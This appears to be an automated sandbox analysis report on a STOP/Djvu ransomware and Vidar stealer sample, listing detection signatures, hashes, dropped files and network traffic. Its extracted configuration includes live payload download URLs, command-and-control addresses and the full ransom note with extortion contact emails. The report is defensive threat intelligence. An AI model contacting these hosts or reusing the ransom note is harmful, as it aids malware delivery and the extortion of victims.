Windows Analysis Report
R5391762lf.exe

Overview

General Information

Sample name:	R5391762lf.exe renamed because original name is a hash value
Original sample name:	4f8fb134c680d0e05861a34827751834.exe
Analysis ID:	1431221
MD5:	4f8fb134c680d0e05861a34827751834
SHA1:	5a20d1ff30218dea67d3ff7f61e16e5cc958006f
SHA256:	9c9ed624eaf441b4637d50fe25d386636c5cb59fb69f5b824afc7cec6dfff7f0
Tags:	exeStop
Infos:

Detection

Clipboard Hijacker, Djvu, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: R5391762lf.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/files/1/build3.exe	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm

Found malware configuration

Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0863PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: R5391762lf.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040E870
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	2_2_0040EA51
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040EAA0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	2_2_0040EC68
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	2_2_00410FC0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,	2_2_00411178

Source: R5391762lf.exe, 00000007.00000003.2078287754.00000000030F1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2e10f168-1

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Uses 32bit PE files

Source: R5391762lf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
